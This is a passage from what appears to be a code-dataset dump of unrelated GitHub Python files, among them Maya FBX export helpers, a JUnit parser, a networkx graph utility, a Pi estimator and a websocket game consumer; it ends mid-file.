original_start_frame = cmds.playbackOptions(query=True, minTime=True)\n original_end_frame = cmds.playbackOptions(query=True, maxTime=True)\n temp_mesh = None\n temp_skin_cluster = None\n original_anim_layer_weights = animLayers.get_layer_weights()\n\n try:\n # default mute status to on\n animlayer_mute = True\n\n # set anim layer to enable\n if animLayers.animation_layer_exists(anim_layer):\n animLayers.set_layer_weight(anim_layer, toggle_other_off=True)\n \n # Store anim layer mute status\n animlayer_mute = cmds.animLayer(anim_layer, query=True, mute=True)\n cmds.animLayer(anim_layer, edit=True, mute=False)\n\n # disable viewport\n mel.eval(\"paneLayout -e -manage false $gMainPane\")\n\n pfbx.FBXResetExport()\n\n # set configuration\n fbx_version_str = None\n if preset_path is not None:\n # load FBX export preset file\n pfbx.FBXLoadExportPresetFile(f=preset_path)\n if up_axis is not None:\n pfbx.FBXExportUpAxis(up_axis.lower())\n if fbx_version is not None:\n fbx_version_str = \"{}00\".format(\n fbx_version.split(\"/\")[0].replace(\" \", \"\")\n )\n pfbx.FBXExportFileVersion(v=fbx_version_str)\n if file_type == \"ascii\":\n pfbx.FBXExportInAscii(v=True)\n\n # # create temporal triangle to skin\n # temp_mesh = cmds.polyCreateFacet(point=[(-0, 0, 0), (0, 0, 0), (0, 0, 0)], name='mgear_temp_mesh')[0]\n # temp_skin_cluster = cmds.skinCluster(\n # [root_joint], temp_mesh, toSelectedBones=False, maximumInfluences=1, skinMethod=0)[0]\n\n # select elements to export\n pm.select([root_joint])\n\n # Set frame range\n cmds.currentTime(start_frame)\n old_frame_rate = coreUtils.get_frame_rate()\n new_frame_rate = frame_rate\n # only set if frame rate changed\n mult_rate = new_frame_rate / old_frame_rate\n if mult_rate != 1:\n old_range = start_frame, end_frame\n start_frame = old_range[0] * mult_rate\n end_frame = old_range[1] * mult_rate\n coreUtils.set_frame_rate(frame_rate)\n\n pm.autoKeyframe(state=False)\n pfbx.FBXExportAnimationOnly(v=False)\n pfbx.FBXExportBakeComplexAnimation(v=True)\n pfbx.FBXExportBakeComplexStart(v=start_frame)\n pfbx.FBXExportBakeComplexEnd(v=end_frame)\n pfbx.FBXExportCameras(v=True)\n pfbx.FBXExportConstraints(v=True)\n pfbx.FBXExportLights(v=True)\n pfbx.FBXExportQuaternion(v=\"quaternion\")\n pfbx.FBXExportAxisConversionMethod(\"none\")\n pfbx.FBXExportApplyConstantKeyReducer(v=False)\n pfbx.FBXExportSmoothMesh(v=False)\n pfbx.FBXExportShapes(v=True)\n pfbx.FBXExportSkins(v=True)\n pfbx.FBXExportSkeletonDefinitions(v=True)\n pfbx.FBXExportEmbeddedTextures(v=False)\n pfbx.FBXExportInputConnections(v=True)\n pfbx.FBXExportInstances(v=True)\n pfbx.FBXExportUseSceneName(v=True)\n pfbx.FBXExportSplitAnimationIntoTakes(c=True)\n pfbx.FBXExportGenerateLog(v=False)\n pfbx.FBXExport(f=path, s=True)\n except Exception as exc:\n raise exc\n finally:\n # setup again original anim layer weights\n if anim_layer and original_anim_layer_weights:\n animLayers.set_layer_weights(original_anim_layer_weights)\n # Sets the animation layer back to default\n cmds.animLayer(anim_layer, edit=True, mute=animlayer_mute)\n\n if temp_skin_cluster and cmds.objExists(temp_skin_cluster):\n cmds.delete(temp_skin_cluster)\n if temp_mesh and cmds.objExists(temp_mesh):\n cmds.delete(temp_mesh)\n\n cmds.currentTime(current_frame)\n cmds.currentUnit(time=current_frame_range)\n\n pm.autoKeyframe(state=auto_key_state)\n pm.cycleCheck(evaluation=cycle_check)\n cmds.playbackOptions(min=original_start_frame, max=original_end_frame)\n\n # if the scene was not modified before doing our changes, we force it back now\n if scene_modified is False:\n cmds.file(modified=False)\n\n # enable viewport\n mel.eval(\"paneLayout -e -manage true $gMainPane\")\n\n return path\n\n\ndef create_mgear_playblast(\n file_name=\"\", folder=None, start_frame=None, end_frame=None, scale=75\n):\n file_name = file_name or \"playblast\"\n file_name = os.path.splitext(os.path.basename(file_name))[0]\n file_name = \"{}.avi\".format(file_name)\n time_range = cmds.playbackOptions(\n query=True, minTime=True\n ), cmds.playbackOptions(query=True, maxTime=True)\n start_frame = start_frame if start_frame is not None else time_range[0]\n end_frame = end_frame if end_frame is not None else time_range[1]\n if end_frame <= start_frame:\n end_frame = start_frame + 1\n\n if not folder or not os.path.isdir(folder):\n folder = get_mgear_playblasts_folder()\n if not os.path.isdir(folder):\n os.makedirs(folder)\n if not os.path.isdir(folder):\n cmds.warning(\n 'Was not possible to create mgear playblasts folder: \"{}\"'.format(\n folder\n )\n )\n return False\n full_path = os.path.join(folder, file_name)\n count = 1\n while os.path.isfile(full_path):\n _file_name = \"{}_{}{}\".format(\n os.path.splitext(file_name)[0],\n count,\n os.path.splitext(file_name)[1],\n )\n full_path = os.path.join(folder, _file_name)\n count += 1\n\n cmds.playbackOptions(\n animationStartTime=start_frame,\n minTime=start_frame,\n animationEndTime=end_frame,\n maxTime=end_frame,\n )\n cmds.currentTime(start_frame, edit=True)\n cmds.playblast(p=scale, filename=full_path, forceOverwrite=True)\n\n return True\n\n\ndef get_mgear_playblasts_folder():\n CSIDL_PERSONAL = 5 # My Documents\n SHGFP_TYPE_CURRENT = 0 # Get current, not default value\n buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)\n ctypes.windll.shell32.SHGetFolderPathW(\n None, CSIDL_PERSONAL, None, SHGFP_TYPE_CURRENT, buf\n )\n documents_folder = os.path.abspath(buf.value)\n playblasts_folder = os.path.join(documents_folder, \"mgear_playblasts\")\n\n return playblasts_folder\n\n\ndef open_mgear_playblast_folder():\n folder = get_mgear_playblasts_folder()\n if not folder or not os.path.isdir(folder):\n cmds.warning(\n 'Was not possible to open mgear playblasts folder: \"{}\"'.format(\n folder\n )\n )\n return False\n\n if sys.platform.startswith(\"darwin\"):\n subprocess.Popen([\"open\", folder])\n elif os.name == \"nt\":\n os.startfile(folder)\n elif os.name == \"posix\":\n subprocess.Popen([\"xdg-open\", folder])\n else:\n cmds.error(\"OS not supported: {}\".format(os.name))\n\n return True\n\n\ndef get_geo_grp():\n \"\"\"Return the geometry group (objectSet in Maya) of the rig.\n If more than one xxx_geo_grp is available will pop up a selection list\n\n Returns:\n PyNode: objectSet\n \"\"\"\n geo_grp = None\n geo_groups = pm.ls(\"*:*_geo_grp\", \"*_geo_grp\", type=\"objectSet\")\n if geo_groups:\n if len(geo_groups) > 1:\n item = select_item(geo_groups, \"Select Geo Group\")\n if item:\n geo_grp = pm.PyNode(item)\n else:\n geo_grp = geo_groups[0]\n return geo_grp\n\n\ndef get_geo_root():\n geo_grp = get_geo_grp()\n if geo_grp:\n memb = geo_grp.members()\n if memb:\n return memb\n else:\n pm.displayWarning(\"Geo_grp is empty. Please set geo root manually\")\n else:\n pm.displayWarning(\n \"Not Geo_grp available, please set geo roots manually\"\n )\n\n\ndef get_joint_org():\n jnt_org = None\n joint_orgs = pm.ls(\"*:jnt_org\", \"*jnt_org\", type=\"transform\")\n if joint_orgs:\n if len(joint_orgs) > 1:\n item = select_item(joint_orgs, \"Select Joint Org Node\")\n if item:\n jnt_org = pm.PyNode(item)\n else:\n jnt_org = joint_orgs[0]\n return jnt_org\n\n\ndef get_joint_root():\n jnt_org = get_joint_org()\n if jnt_org:\n return jnt_org.getChildren()\n else:\n pm.displayWarning(\n \"Not Joint found under jnt_org, please set joint roots manually\"\n )\n\n\ndef select_item(items, title):\n \"\"\"Create modal dialog to select item from list and return the selected tiem\n\n Args:\n items (list): List of str items\n title (str): Tittle for the modoal dialo\n\n Returns:\n str: selected item\n \"\"\"\n item = None\n select_dialog = SelectorDialog(items, title)\n\n result = select_dialog.exec_()\n\n if result == QtWidgets.QDialog.Accepted:\n item = select_dialog.item\n\n return item\n\n\ndef get_end_joint(start_joint):\n end_joint = None\n next_joint = start_joint\n while next_joint:\n child_list = (\n pm.listRelatives(next_joint, fullPath=True, c=True) or list()\n )\n child_joints = pm.ls(child_list, long=True, type=\"joint\") or list()\n if child_joints:\n next_joint = child_joints[0]\n else:\n end_joint = next_joint\n next_joint = None\n\n return end_joint\n\n# ------- namespaces ------\n\n\ndef _count_namespaces(name):\n # Custom function to count the number of \":\" in a name\n return name.count(':')\n\n\ndef clean_namespaces(export_data):\n \"\"\"\n Gets all available namespaces in scene.\n Checks each for objects that have it assigned.\n Removes the namespace from the object.\n \"\"\"\n namespaces = get_scene_namespaces()\n\n # Sort namespaces by longest nested first\n namespaces = sorted(namespaces, key=_count_namespaces, reverse=True)\n\n for namespace in namespaces:\n print(\" - {}\".format(namespace))\n child_namespaces = om.MNamespace.getNamespaces(namespace, True)\n\n for chld_ns in child_namespaces:\n m_objs = om.MNamespace.getNamespaceObjects(chld_ns)\n for m_obj in m_objs:\n remove_namespace(m_obj)\n\n m_objs = om.MNamespace.getNamespaceObjects(namespace)\n for m_obj in m_objs:\n remove_namespace(m_obj)\n\n filtered_export_data = clean_export_namespaces(export_data)\n return filtered_export_data\n\n\ndef clean_export_namespaces(export_data):\n \"\"\"\n Looks at all the joints and mesh data in the export data and removes\n any namespaces that exists.\n \"\"\"\n \n for key in export_data.keys():\n\n # ignore filepath, as it contains ':', which will break the path\n if key == \"file_path\" or key == \"color\":\n continue\n\n value = export_data[key]\n\n print(key, value)\n\n if isinstance(value, list):\n for i in range(len(value)):\n value[i] = trim_namespace_from_name(value[i])\n elif isinstance(value, dict):\n value = clean_export_namespaces(value)\n elif isinstance(value, str):\n value = trim_namespace_from_name(value)\n\n export_data[key] = value\n\n return export_data\n\n\ndef count_namespaces(name):\n # Custom function to count the number of \":\" in a name\n return name.count(':')\n\n\ndef trim_namespace_from_name(name):\n if name.find(\":\") >= 0:\n return name.split(\":\")[-1]\n return name\n\n\ndef remove_namespace(mobj):\n \"\"\"\n Removes the namesspace that is currently assigned to the asset\n \"\"\"\n dg = om.MFnDependencyNode(mobj)\n name = dg.name()\n dg.setName(name[len(dg.namespace):])\n\n\ndef get_scene_namespaces():\n \"\"\"\n Gets all namespaces in the scene.\n \"\"\"\n IGNORED_NAMESPACES = [\":UI\", \":shared\", \":root\"]\n spaces = om.MNamespace.getNamespaces(recurse=True)\n for ignored in IGNORED_NAMESPACES:\n if ignored in spaces:\n spaces.remove(ignored)\n\n return spaces\n\n\ndef get_scene_path():\n \"\"\"\n Get the file path of the current scene.\n\n Returns:\n str: path of the current open scene file\n \"\"\"\n return cmds.file(query=True, sceneName=True)\n\n\nif __name__ == \"__main__\":\n if sys.version_info[0] == 2:\n reload(pfbx)\n else:\n import importlib\n\n importlib.reload(pfbx)\n\n # export_skeletal_mesh(\n # \"Root\", \"geo_root\", r\"C:\\Users/Miquel/Desktop/testing_auto2.fbx\"\n # )\n\n grp = get_joint_root()\n print(grp)\n","repo_name":"MonsieurGallo/mgear4","sub_path":"release/scripts/mgear/shifter/game_tools_fbx/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"29638590156","text":"def MinDivisor(n):\r\n i = 1\r\n divider = 1\r\n while i <= n**0.5:\r\n if n % i == 0 and n // i < n:\r\n divider = i\r\n break\r\n else:\r\n divider = n\r\n i += 1\r\n return divider\r\n\r\n\r\nn = int(input())\r\nprint(MinDivisor(n))\r\n","repo_name":"Zohaval/Coursera","sub_path":"4.4.py","file_name":"4.4.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22198120211","text":"import networkx as nx\nimport json\nimport numpy as np\n\nfrom graph.models import full_network, Node\nfrom graph.utils.render_subgraph import edge_to_indexed_dictionary\n\n\ndef closed_neighbors(digraph: nx.DiGraph, node_name: str):\n return list(digraph.subgraph(\n nx.all_neighbors(digraph, node_name)).nodes) + [node_name]\n\n\ndef closed_neighborhood(digraph: nx.DiGraph, node_name: str):\n return digraph.subgraph(closed_neighbors(digraph, node_name))\n \n \ndef node_adj(digraph: nx.DiGraph, center: str, other: str, pred=None, succ=None):\n \"\"\" can pass in precalculated lists or generators of pred and succ \"\"\"\n if pred is None:\n pred = list(digraph.predecessors(center))\n if succ is None:\n succ = list(digraph.successors(center))\n output = 0\n if other in succ:\n output += 1\n if other in pred:\n output += 2\n return output\n \n\ndef neighborhood_nodes(digraph: nx.DiGraph, node_name: str):\n output = []\n idx = 0\n pred = list(digraph.predecessors(node_name))\n succ = list(digraph.successors(node_name))\n for node in digraph:\n node_dict = {}\n node_dict[\"name\"] = node\n node_dict[\"index\"] = idx\n node_dict[\"title\"] = digraph.nodes[node][\"title\"]\n node_dict[\"url\"] = digraph.nodes[node][\"url\"]\n node_dict[\"adj\"] = node_adj(digraph, node_name, node_dict[\"name\"], pred, succ)\n output.append(node_dict)\n idx += 1\n return output\n\n\ndef neighborhood_edges(digraph: nx.DiGraph, node_list, center: str):\n output = []\n for edge in digraph.edges:\n edge_dict = edge_to_indexed_dictionary(edge, node_list)\n if edge[0] == center:\n edge_dict[\"direction\"] = \"out\"\n elif edge[1] == center:\n edge_dict[\"direction\"] = \"in\"\n else:\n edge_dict[\"direction\"] = \"secondary\"\n output.append(edge_dict)\n return output\n\n\ndef neighbor_sentence(center: str, nodes: dict):\n title = Node.objects.get(name=center).title\n n_succ = len(list(full_network.dg.successors(center)))\n n_pred = len(list(full_network.dg.predecessors(center)))\n succ_word = \"successor\" if n_succ == 1 else \"successors\"\n pred_word = \"predecessor\" if n_pred == 1 else \"predecessors\"\n return f'The article \"{title}\" links to {n_succ} {succ_word} and is linked to by {n_pred} {pred_word}.'\n\n\ndef render_neighborhood(center: str):\n cn = closed_neighborhood(full_network.dg, center)\n nodes = neighborhood_nodes(cn, center)\n node_dicts = list(nodes)\n edges = neighborhood_edges(cn, nodes, center)\n json_nodes = json.dumps(nodes, ensure_ascii=False)\n json_edges = json.dumps(edges, ensure_ascii=False)\n sentence = neighbor_sentence(center, nodes)\n return json_nodes, json_edges, sentence, node_dicts\n\n\n","repo_name":"reppertj/philosophical-graphiti","sub_path":"graph/utils/neighbors.py","file_name":"neighbors.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"16158311602","text":"import logging\nfrom xml.etree import ElementTree\nfrom datetime import timedelta\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef parse_time(string_value):\n try:\n return float(string_value)\n except:\n return 0.0\n\n\ndef parse_properties(root):\n properties = []\n for child in root:\n tag = child.tag\n if tag != \"property\":\n continue\n property_name = child.get(\"name\", \"\").strip()\n property_value = child.get(\"value\", \"\")\n if property_name:\n properties.append({\"name\": property_name, \"value\": property_value})\n return properties\n\n\ndef parse_element(root):\n testcase = {\n \"name\": root.attrib.get(\"name\", \"\"),\n \"classname\": root.attrib.get(\"classname\", \"\"),\n \"regression\": False,\n \"successfix\": False,\n \"time\": parse_time(root.attrib.get(\"time\", \"0\")),\n \"message\": \"\",\n \"value\": \"\",\n \"action\": \"passed\",\n \"type\": \"\",\n \"stdout\": None,\n \"stderr\": None,\n \"properties\": [],\n }\n for child in root:\n tag = child.tag\n if tag not in [\n \"skipped\",\n \"error\",\n \"failure\",\n \"system-out\",\n \"system-err\",\n \"properties\",\n ]:\n continue\n text = child.text\n if tag == \"system-out\":\n testcase[\"stdout\"] = text\n elif tag == \"system-err\":\n testcase[\"stderr\"] = text\n elif tag == \"properties\":\n testcase[\"properties\"] = parse_properties(child)\n else:\n testcase[\"action\"] = tag\n testcase[\"message\"] = child.get(\"message\", \"\")\n testcase[\"type\"] = child.get(\"type\", \"\")\n testcase[\"value\"] = text\n return testcase\n\n\ndef junit2dict(file_descriptor):\n results = {\n \"success\": 0,\n \"errors\": 0,\n \"failures\": 0,\n \"regressions\": 0,\n \"successfixes\": 0,\n \"skips\": 0,\n \"total\": 0,\n \"testscases\": [],\n \"time\": 0,\n }\n try:\n test_duration = timedelta(seconds=0)\n for event, element in ElementTree.iterparse(file_descriptor):\n if element.tag == \"testcase\":\n testcase = parse_element(element)\n results[\"total\"] += 1\n time = parse_time(testcase.get(\"time\", \"0\"))\n test_duration += timedelta(seconds=time)\n action = testcase[\"action\"]\n if action == \"skipped\":\n results[\"skips\"] += 1\n if action == \"error\":\n results[\"errors\"] += 1\n if action == \"failure\":\n results[\"failures\"] += 1\n results[\"testscases\"].append(testcase)\n element.clear()\n results[\"success\"] = (\n results[\"total\"]\n - results[\"failures\"]\n - results[\"errors\"]\n - results[\"skips\"]\n )\n results[\"time\"] += int(test_duration.total_seconds() * 1000)\n except ElementTree.ParseError as pe:\n results[\"error\"] = \"ParseError: %s \" % str(pe)\n logger.error(\"ParseError %s\" % str(pe))\n except Exception as e:\n results[\"error\"] = \"Exception: %s \" % str(e)\n logger.exception(e)\n return results\n\n\ndef _concat_classname_and_name(testcase):\n return \"%s:%s\" % (testcase[\"classname\"], testcase[\"name\"])\n\n\ndef add_regressions_and_successfix_to_tests(testsuite1, testsuite2):\n # dict from testcase's name to each testcase itself for fast access\n testscases1_map = dict()\n for testcase in testsuite1[\"testscases\"]:\n testkey = _concat_classname_and_name(testcase)\n testscases1_map[testkey] = testcase\n\n for testcase in testsuite2[\"testscases\"]:\n testkey2 = _concat_classname_and_name(testcase)\n # this is a new test then ignore it\n if testkey2 not in testscases1_map:\n continue\n prev_testcase = testscases1_map[testkey2]\n # if switch from success to failure then its a regression\n if testcase[\"action\"] == \"failure\":\n if prev_testcase[\"action\"] == \"passed\" or prev_testcase[\"regression\"]:\n testcase[\"regression\"] = True\n testsuite2[\"regressions\"] += 1\n # if switch from either failure/regression to success its successfix\n elif testcase[\"action\"] == \"passed\":\n if prev_testcase[\"action\"] == \"failure\" or prev_testcase[\"regression\"]:\n testcase[\"successfix\"] = True\n testsuite2[\"successfixes\"] += 1\n return testsuite2\n","repo_name":"redhat-cip/dci-control-server","sub_path":"dci/api/v1/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"35"} +{"seq_id":"9614550259","text":"import pandas as pd\nimport os\nimport datetime\n\nimport sqlalchemy\nfrom pyspark.sql import SparkSession\n\nML_PREDICT_DIR = os.path.dirname(os.path.abspath(__file__))\nML_DIR = os.path.dirname(ML_PREDICT_DIR)\nSRC_DIR = os.path.dirname(ML_DIR)\nBASE_DIR = os.path.dirname(SRC_DIR)\nDATA_DIR = os.path.join(BASE_DIR, 'data')\nDATA_PREDICT_DIR = os.path.join(DATA_DIR, 'predict')\nDATA_SCORE_DIR = os.path.join(DATA_DIR, 'score')\nMODEL_DIR = os.path.join(BASE_DIR, 'models')\n\nprint(\"Importando os dados com score...\", end=\"\")\ndf = pd.read_csv(os.path.join(DATA_SCORE_DIR, \"tb_score.csv\"),\n sep = \"|\",\n index_col=[0])\nprint(\"ok.\")\n\nprint(\"Abrindo conexão com banco de dados...\", end=\"\")\nDATABASE_DIR = os.path.abspath(os.path.join(__file__, \"../../../../..\"))\nspark = sqlalchemy.create_engine(\"sqlite:///\" + str(DATABASE_DIR) +\"\\\\database\\\\olist.db\")\nprint(\"ok.\")\n\n\nprint(df.head())\n\n# Evitando que haja duplicatas de previsoes feitas no mesmo dia\ntry:\n query = sqlalchemy.text(\"DELETE FROM tb_score_churn WHERE dt_ref IN :ids;\")\n query = query.bindparams(sqlalchemy.bindparam('ids', expanding=True))\n spark.execute(query, ids=list(df['dt_ref'].unique()))\nexcept:\n print('tabela vazia/primeiro dado do dia')\n\nprint(\"Salvando dataframe no banco de dados...\", end=\"\\n\")\ndf.to_sql(\"tb_score_churn\", spark, if_exists=\"append\")\nprint(\"ok.\")\n","repo_name":"lucwas/olist-churn","sub_path":"crm_churn/src/ml/predict/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"9550622530","text":"\"\"\"\r\n 4IRC\r\n Exercice approximation de la valeur de PI par la méthode de l'esperance\r\n Groupe :\r\n - Maxime BATTU\r\n - Eileen BALAGUER\r\n - Batiste LALOI\r\n\"\"\"\r\n\r\nimport time\r\nimport multiprocessing as mp\r\nimport math\r\nimport random\r\n\r\nNB_PROCESS = 4\r\n\r\ndef loiEsperance(array, queue):\r\n \"\"\"\r\n Méthode prenant un tableau de valeur et une Queue\r\n Elle permet de calculer la moyenne d'une aire d'un cercle par la méthode d'espérance\r\n \"\"\"\r\n somme = 0\r\n\r\n formule = \"math.sqrt(1 - math.pow(x, 2))\"\r\n\r\n for nombre in array:\r\n f = formule.replace(\"x\", str(nombre))\r\n somme += eval(f)\r\n \r\n queue.put(somme)\r\n\r\n\r\ndef estimePI(pi, nbIterations):\r\n \"\"\"\r\n Permet d'estimer PI\r\n \"\"\"\r\n return pi / nbIterations\r\n\r\n\r\nif __name__ == \"__main__\":\r\n queue = mp.Queue()\r\n\r\n # Nombre d’essai pour l’estimation\r\n nbIterations = 1_000_000\r\n \r\n start = time.time()\r\n\r\n # Tableau de processus\r\n processes = []\r\n\r\n tableau = [random.random() for _ in range(nbIterations)]\r\n \r\n # Création du multiprocessing\r\n for i in range(NB_PROCESS):\r\n process = mp.Process(target=loiEsperance, args=(tableau, queue,))\r\n processes.append(process)\r\n process.start()\r\n\r\n pi = 0\r\n for process in processes:\r\n process.join()\r\n pi += estimePI(queue.get(), nbIterations)\r\n\r\n print(\r\n f\"Valeur estimée Pi par la méthode d'espérance avec {NB_PROCESS} processus : {pi}\")\r\n \r\n end = time.time()\r\n\r\n temps = end - start\r\n\r\n print(\r\n f\"Temps de traitement {temps:.2f} secondes pour {nbIterations} iterations en multiprocess\")\r\n","repo_name":"MaximeBattu/programmation_concurrente","sub_path":"python/multiprocessing/estimation-PI-esperance.py","file_name":"estimation-PI-esperance.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10932289920","text":"import numpy as np\nimport random as rnd\nimport sys\nimport scipy.optimize\n\n# dictionary = {'c_k': [alpha_k, c_k]}\n\n\n################################# FUNCTIONS ##################################\n\ndef c_k(dictionary):\n c_k_list = [dictionary[key][1] for key in dictionary.keys()]\n return np.array(c_k_list)\n\ndef alpha_k(dictionary):\n alpha_k_list = [dictionary[key][0] for key in dictionary.keys()]\n return np.array(alpha_k_list)\n\ndef f(x, d):\n value = 0\n for key in d.keys():\n alpha = d[key][0]\n c = d[key][1]\n value += alpha*scipy.exp(c*x)\n return value\n\n################################### INPUT ####################################\n\n\n# observable = np.array([rnd.randint(0,1) for _ in range(N)])\n\n\n#################################### HMM #####################################\n\ndef forwardprop(obs, mu, rho, n):\n N = len(obs)\n lam = 1/n\n coef_list = []\n \n# zeroth iteration (first)\n coef_0 = dict()\n if obs[0] == 0:\n z_0 = lam / (lam + 2 * mu)\n \n alpha = lam / z_0\n c = - lam - 2 * mu\n key = str(round(c, 4))\n coef_0[key] = [alpha, c]\n else:\n z_0 = 2 * mu / (lam + 2 * mu)\n \n alpha = lam / z_0\n c = - lam\n key = str(round(c, 4))\n coef_0[key] = [alpha, c]\n \n alpha = -lam / z_0 \n c = - lam - 2 * mu\n key = str(round(c, 4))\n coef_0[key] = [alpha, c]\n coef_list.append(coef_0)\n\n for k in range(1, N):\n D = coef_list[k - 1] # previous dictionary\n coef_k = dict() # current dictionary\n A_K = alpha_k(D)\n C_K = c_k(D)\n if obs[k - 1] == 0:\n z_i = sum(A_K * (2 * rho * lam / \n ((lam + 2 * mu) * C_K * (C_K - 2 * rho)) - \n 1 / (C_K - 2 * rho - 2 * mu)))\n alpha = lam / z_i * sum(A_K * (1/(C_K-2*rho) - 1/(C_K)))\n c = -lam - 2 * mu\n key = str(round(c, 4))\n coef_k[key] = [alpha, c]\n for i in range(len(D)):\n alpha_new = A_K[i]/z_i\n c = C_K[i] - 2*rho - 2*mu\n key = str(round(c, 4))\n if key in coef_k.keys():\n coef_k[key][0] += alpha_new\n else:\n coef_k[key] = [alpha_new, c]\n else:\n z_i = sum(A_K*((1/C_K+1/(C_K-2*mu)) * (2 * mu / (lam + 2 * mu)) - \n 1 / (C_K - 2 * rho) + 1 / (C_K - 2 * rho - 2 * mu)))\n c = - lam\n alpha = lam / z_i * sum(A_K * (1/(C_K - 2 * rho) - 1/C_K))\n key = str(round(c, 4))\n coef_k[key] = [alpha, c]\n \n c = - lam - 2 * mu\n alpha = - alpha\n key = str(round(c, 4))\n coef_k[key] = [alpha, c]\n for i in range(len(D)):\n alpha_new = A_K[i]/z_i\n c_1 = C_K[i] - 2 * rho\n key_1 = str(round(c_1, 4))\n\n c_2 = C_K[i] - 2*rho - 2*mu\n key_2 = str(round(c_2, 4))\n if key_1 in coef_k.keys():\n coef_k[key_1][0] += alpha_new\n else:\n coef_k[key_1] = [alpha_new, c_1]\n if key_2 in coef_k.keys():\n coef_k[key_2][0] += - alpha_new\n else:\n coef_k[key_2] = [- alpha_new, c_2]\n coef_list.append(coef_k)\n return coef_list\n\n\ndef backwardprop(ceof_list, obs, mu, rho, n):\n N = len(obs)\n lam = 1/n\n height_list = [0 for _ in range(N)]\n argmax_n = scipy.optimize.fmin(lambda x: -f(x, ceof_list[-1]), 0)[0]\n if argmax_n < 0:\n print(0)\n height_list[-1] = argmax_n\n for i in range(2, N + 1):\n t_prev = height_list[-i+1]\n if obs[-i] == 0:\n p_eq = ((1 - np.exp(-2 * rho * t_prev)) * lam * np.exp(-lam*t_prev) \n + np.exp(-2 * rho * t_prev)) * np.exp(-2 * mu * t_prev)\n p_ineq = (1 - np.exp(-2 * rho * t_prev)) * lam\n if p_eq > p_ineq:\n t_i = t_prev\n else:\n t_i = 0\n if t_i < 0:\n print(i, 1)\n height_list[-i] = t_i\n elif obs[-i] == 1:\n p_eq = ((1 - np.exp(-2 * rho * t_prev)) * lam * np.exp(-lam*t_prev) \n + np.exp(-2 * rho * t_prev)) * (1 - np.exp(-2 * mu * t_prev))\n p_ineq = ((1 - np.exp(-2 * rho * t_prev)) * 2 * mu * lam / (2 * mu + lam) + \n (lam / (2 * mu + lam))**(lam / (2 * mu)))\n if p_eq > p_ineq:\n t_i = t_prev\n else:\n t_i = - np.log(lam / (2 * mu + lam)) / (2 * mu)\n if t_i < 0:\n print(i, 2)\n height_list[-i] = t_i\n return height_list\n\n\ndef backwardprop2(coef_list, obs, mu, rho, n):\n N = len(obs)\n height_list = [scipy.optimize.fmin(lambda x: -f(x, coef), 0)[0] for coef in coef_list]\n return height_list","repo_name":"amovsheva/Forest","sub_path":"TreeHeightRecon.py","file_name":"TreeHeightRecon.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27408235834","text":"import json\nimport threading\n\n\nfrom time import sleep\nfrom asgiref.sync import sync_to_async\n\n\nfrom channels.generic.websocket import WebsocketConsumer\n\n\nfrom phrases.models.models import StoryTopic\nfrom phrases.generator import PhraseGenerator\n\n\nfrom gameplay.codes import (\n Code, FirstPhrasesGenerated, NotEnoughPhrasesToReturn, TopicNotFound, TopicSelected,\n ReturnPentagonPhrases, ReturnMonoPhrase, SelectTopic, PhrasesP5, PhrasesP1\n)\n\n\nfrom print_pp.logging import Print\n\n\n\nBACKEND_CODES_INFORMATION = {\n \"BGT-200\": \"Topic selected\",\n \"BGT-400\": \"Topic not selected\",\n\n \"BGP-200\": \"First phrases generated\",\n \"BGP-205\": \"Not enough phrases to return\",\n}\n\n\nFRONTEND_CODES_INFORMATION = {\n \"FGT-101\": \"Select topic\",\n\n \"FGP-100\": \"Start phrase generation\",\n \"FGP-101\": \"Returns 5 phrases\",\n \"FGP-102\": \"Returns 1 phrases\",\n}\n\n\nclass GamePlayConsumer(WebsocketConsumer):\n\n MAX_OPTIONS_TO_GENERATE = 20\n\n\n def __init__(self, *args, **kwargs):\n self.current_topic = None\n self.codes = {\n SelectTopic.code: self.set_current_topic,\n ReturnPentagonPhrases.code: self.return_phrases,\n ReturnMonoPhrase.code: self.return_phrases,\n }\n super().__init__(*args, **kwargs)\n self.phrases_generator = PhraseGenerator(self.current_topic, testing=True)\n\n\n def connect(self):\n self.options:list = list()\n self.options_lock = threading.Lock()\n self.accept()\n \n\n def disconnect(self, close_code):\n pass\n\n\n def receive(self, text_data):\n text_data_json = json.loads(text_data)\n \n if text_data_json[\"code\"] == 'FGP-100':\n threading.Thread(target=self.generate_phrases).start()\n return\n\n self.codes[text_data_json[\"code\"]](text_data_json)\n\n\n def generate_phrases(self) -> list[str]:\n is_first_time = True\n\n while True:\n sleep(2)\n options_to_generate = self.MAX_OPTIONS_TO_GENERATE - len(self.options)\n if is_first_time: options_to_generate = 5\n\n if options_to_generate < 0:\n continue\n \n with self.options_lock:\n options = self.phrases_generator.generate_phrases(num_phrases=options_to_generate)\n self.options.extend(options)\n \n if is_first_time:\n self.send_response(code=FirstPhrasesGenerated)\n is_first_time = False\n\n \n def return_phrases(self, data:dict):\n \n\n if data['code'] == ReturnMonoPhrase.code:\n options_to_return = 1\n code_to_return = PhrasesP1\n elif data['code'] == ReturnPentagonPhrases.code:\n options_to_return = 5\n code_to_return = PhrasesP5\n\n if not self.options:\n self.send_response(code=NotEnoughPhrasesToReturn)\n return\n\n with self.options_lock:\n self.send_response(code_to_return, extra_data={\"options\": self.options[:options_to_return]})\n self.options = self.options[5:]\n\n\n def set_current_topic(self, data:dict):\n \n topic_id = data['topic_id']\n\n if topic_id == \"NONE\":\n self.current_topic = None\n return\n\n try: \n self.current_topic = StoryTopic.objects.get(id=topic_id).name\n except StoryTopic.DoesNotExist: \n 